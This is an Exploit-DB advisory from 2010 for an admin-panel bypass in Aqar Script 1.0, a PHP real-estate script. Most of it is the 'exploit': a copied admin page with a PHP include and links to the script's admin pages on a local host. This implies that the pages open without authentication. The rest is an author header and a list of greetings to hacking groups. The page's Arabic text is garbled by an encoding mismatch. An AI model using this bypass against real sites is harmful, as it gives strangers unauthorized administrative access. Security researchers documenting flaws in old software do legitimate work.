Aqar Script 1.0 - Remote Bypass

EDB-ID:

12567

CVE:

N/A




Platform:

PHP

Date:

2010-05-11


========================================================================================
| # Title : Aqar Script V.1 Remote By pass Exploit
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Script : Powered By AqarScript
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Backup Dump
====================== Exploit By indoushka =================================
# Exploit :

<html dir=rtl>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>
<table border="0" cellspacing="5" cellpadding="0">
<tr>
<td width="100%" colspan="3" valign="top" align="right">
<h1>áæÍÉ ÇáÊÍßã - ÚÞÇÑ ÓßÑíÈÊ</h1>
</td>
<td width="100%" valign="top" align="right">
</td>
</tr>
<tr>
<td valign="top" align="right" nowrap>
<?php
include("./qa2ema.php");
?>
</td>
<meta http-equiv="Content-Language" content="ar-eg">
<td valign="top" align="right"><font face="Tahoma">ÇåáÇð Èß Ýì áæÍÉ
ÇáÊÍßã ÇáÎÇÕÉ ÈÚÞÇÑ ÓßÑíÈÊ<br>
Çä ÔÇÁ Çááå ÎÇÕíÉ ÇÖÇÝÉ ÇãÇßä ÇÖÇÝíÉ Ýì ÕÝÍÉ ÇáÇÖÇÝÉ <br>
ÓÊßæä ãæÌæÏÉ Ýì ÇáäÓÎÉ 2<br>
<br>
<b><font size="1">ãÚ ÊÍíÇÊ ßÑíã äÊ</font></b></font>
</tr>
</table>
</body>
<ul>
<li><a href="http://127.0.0.1/Aqar/admin/aksam.php">ÇáÃÞÓÇã</a></li>
<li><a href="http://127.0.0.1/Aqar/admin/amaken.php">ÇáÇãÇßä ÇáÇÖÇÝíÉ</a></li>
</ul>
</html>

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------